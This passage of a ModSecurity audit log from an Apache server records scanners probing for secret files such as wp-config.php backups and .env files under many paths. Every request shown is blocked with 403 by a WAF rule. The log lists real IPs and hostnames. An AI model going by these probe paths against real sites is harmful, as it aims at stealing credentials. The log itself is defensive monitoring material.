p2=0, p3=0, p4=0, p5=37, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa31f70b-Z-- --debd9477-A-- [19/Apr/2025:07:38:43 +0700] aALwk-vDiFC_ir7MDwaElgAAAFM 103.236.140.4 41366 103.236.140.4 8181 --debd9477-B-- GET /wp-config.php.new2021 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --debd9477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --debd9477-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023123146927 851 (- - -) Stopwatch2: 1745023123146927 851; combined=352, p1=315, p2=0, p3=0, p4=0, p5=37, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --debd9477-Z-- --4bce0b1e-A-- [19/Apr/2025:07:38:43 +0700] aALwk-vDiFC_ir7MDwaEmAAAAEQ 103.236.140.4 41372 103.236.140.4 8181 --4bce0b1e-B-- GET /wp-config.php.new2022 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --4bce0b1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bce0b1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023123790238 833 (- - -) Stopwatch2: 1745023123790238 833; combined=325, p1=293, p2=0, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bce0b1e-Z-- --4f9de019-A-- [19/Apr/2025:07:38:44 +0700] aALwlOvDiFC_ir7MDwaEmQAAAFg 103.236.140.4 41374 103.236.140.4 8181 --4f9de019-B-- GET /wp-config.php.new2023 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --4f9de019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f9de019-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023124408152 696 (- - -) Stopwatch2: 1745023124408152 696; combined=288, p1=255, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f9de019-Z-- --d429cf27-A-- [19/Apr/2025:07:38:45 +0700] aALwlevDiFC_ir7MDwaEmwAAAEg 103.236.140.4 41380 103.236.140.4 8181 --d429cf27-B-- GET /wp-config.php.new2024 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --d429cf27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d429cf27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023125009951 893 (- - -) Stopwatch2: 1745023125009951 893; combined=400, p1=363, p2=0, p3=0, p4=0, p5=37, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d429cf27-Z-- --788c1a0a-A-- [19/Apr/2025:07:38:45 +0700] aALwlXNa4dA2HllpK_MT3wAAAJg 103.236.140.4 41382 103.236.140.4 8181 --788c1a0a-B-- GET /wp-config.php.new2025 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --788c1a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --788c1a0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023125604756 13198 (- - -) Stopwatch2: 1745023125604756 13198; combined=25148, p1=237, p2=0, p3=0, p4=0, p5=12470, sr=67, sw=0, l=0, gc=12441 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --788c1a0a-Z-- --d3bd1364-A-- [19/Apr/2025:07:40:30 +0700] aALw_g6cTFSgLAHl7PpbjwAAABI 103.236.140.4 41742 103.236.140.4 8181 --d3bd1364-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.58 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.58 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --d3bd1364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3bd1364-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023230093565 784 (- - -) Stopwatch2: 1745023230093565 784; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3bd1364-Z-- --eeed7077-A-- [19/Apr/2025:07:40:31 +0700] aALw_0ruoUXZj665VUF9EQAAAM8 103.236.140.4 41750 103.236.140.4 8181 --eeed7077-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.151.123.58 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.151.123.58 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --eeed7077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeed7077-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023231098561 654 (- - -) Stopwatch2: 1745023231098561 654; combined=277, p1=240, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeed7077-Z-- --2d64e630-A-- [19/Apr/2025:08:20:22 +0700] aAL6VkruoUXZj665VUF_CAAAAMA 103.236.140.4 50942 103.236.140.4 8181 --2d64e630-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept-Charset: utf-8 --2d64e630-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d64e630-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745025622878149 788 (- - -) Stopwatch2: 1745025622878149 788; combined=344, p1=304, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d64e630-Z-- --0c0d6520-A-- [19/Apr/2025:09:22:11 +0700] aAMI00ruoUXZj665VUGB6QAAAM4 103.236.140.4 36808 103.236.140.4 8181 --0c0d6520-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 139.59.245.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.245.198 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* --0c0d6520-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c0d6520-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745029331775722 947 (- - -) Stopwatch2: 1745029331775722 947; combined=376, p1=336, p2=0, p3=0, p4=0, p5=40, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c0d6520-Z-- --b9bf0369-A-- [19/Apr/2025:11:06:45 +0700] aAMhVUruoUXZj665VUGI5AAAANc 103.236.140.4 33420 103.236.140.4 8181 --b9bf0369-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.203.68.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.203.68.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b9bf0369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9bf0369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745035605686505 709 (- - -) Stopwatch2: 1745035605686505 709; combined=313, p1=275, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bf0369-Z-- --43191243-A-- [19/Apr/2025:11:17:41 +0700] aAMj5Q6cTFSgLAHl7Ppq5AAAABM 103.236.140.4 35866 103.236.140.4 8181 --43191243-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --43191243-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43191243-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036261593698 672 (- - -) Stopwatch2: 1745036261593698 672; combined=262, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43191243-Z-- --cc765e16-A-- [19/Apr/2025:11:17:42 +0700] aAMj5g6cTFSgLAHl7Ppq5gAAABQ 103.236.140.4 35872 103.236.140.4 8181 --cc765e16-B-- GET /.env.local HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --cc765e16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc765e16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036262728504 762 (- - -) Stopwatch2: 1745036262728504 762; combined=301, p1=263, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc765e16-Z-- --8b36c75f-A-- [19/Apr/2025:11:17:44 +0700] aAMj6A6cTFSgLAHl7Ppq6AAAABg 103.236.140.4 35878 103.236.140.4 8181 --8b36c75f-B-- GET /.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --8b36c75f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b36c75f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036264346831 752 (- - -) Stopwatch2: 1745036264346831 752; combined=358, p1=262, p2=0, p3=0, p4=0, p5=96, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b36c75f-Z-- --492ae06a-A-- [19/Apr/2025:11:17:46 +0700] aAMj6nNa4dA2HllpK_MfwwAAAIM 103.236.140.4 35890 103.236.140.4 8181 --492ae06a-B-- GET /wp-content/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --492ae06a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --492ae06a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036266575751 875 (- - -) Stopwatch2: 1745036266575751 875; combined=369, p1=323, p2=0, p3=0, p4=0, p5=46, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --492ae06a-Z-- --f557056e-A-- [19/Apr/2025:11:17:47 +0700] aAMj63Na4dA2HllpK_MfxAAAAJc 103.236.140.4 35896 103.236.140.4 8181 --f557056e-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --f557056e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f557056e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036267696759 784 (- - -) Stopwatch2: 1745036267696759 784; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f557056e-Z-- --6a5dcf67-A-- [19/Apr/2025:11:17:48 +0700] aAMj7HNa4dA2HllpK_MfxQAAAIk 103.236.140.4 35906 103.236.140.4 8181 --6a5dcf67-B-- GET /app/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --6a5dcf67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a5dcf67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036268957528 845 (- - -) Stopwatch2: 1745036268957528 845; combined=389, p1=347, p2=0, p3=0, p4=0, p5=42, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a5dcf67-Z-- --a0a4c61d-A-- [19/Apr/2025:11:17:49 +0700] aAMj7Q6cTFSgLAHl7Ppq7AAAAAY 103.236.140.4 35908 103.236.140.4 8181 --a0a4c61d-B-- GET /config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --a0a4c61d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0a4c61d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036269910918 903 (- - -) Stopwatch2: 1745036269910918 903; combined=366, p1=324, p2=0, p3=0, p4=0, p5=42, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0a4c61d-Z-- --8398f572-A-- [19/Apr/2025:11:17:50 +0700] aAMj7nNa4dA2HllpK_MfxwAAAIg 103.236.140.4 35914 103.236.140.4 8181 --8398f572-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --8398f572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8398f572-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036270953249 698 (- - -) Stopwatch2: 1745036270953249 698; combined=265, p1=230, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8398f572-Z-- --c66da717-A-- [19/Apr/2025:11:17:52 +0700] aAMj8A6cTFSgLAHl7Ppq8AAAAAo 103.236.140.4 35926 103.236.140.4 8181 --c66da717-B-- GET /laravel/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --c66da717-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c66da717-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036272747375 756 (- - -) Stopwatch2: 1745036272747375 756; combined=339, p1=311, p2=0, p3=0, p4=0, p5=27, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c66da717-Z-- --c847ce79-A-- [19/Apr/2025:11:17:53 +0700] aAMj8Q6cTFSgLAHl7Ppq8gAAAAw 103.236.140.4 35932 103.236.140.4 8181 --c847ce79-B-- GET /library/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --c847ce79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c847ce79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036273607156 827 (- - -) Stopwatch2: 1745036273607156 827; combined=357, p1=315, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c847ce79-Z-- --43efa325-A-- [19/Apr/2025:11:17:54 +0700] 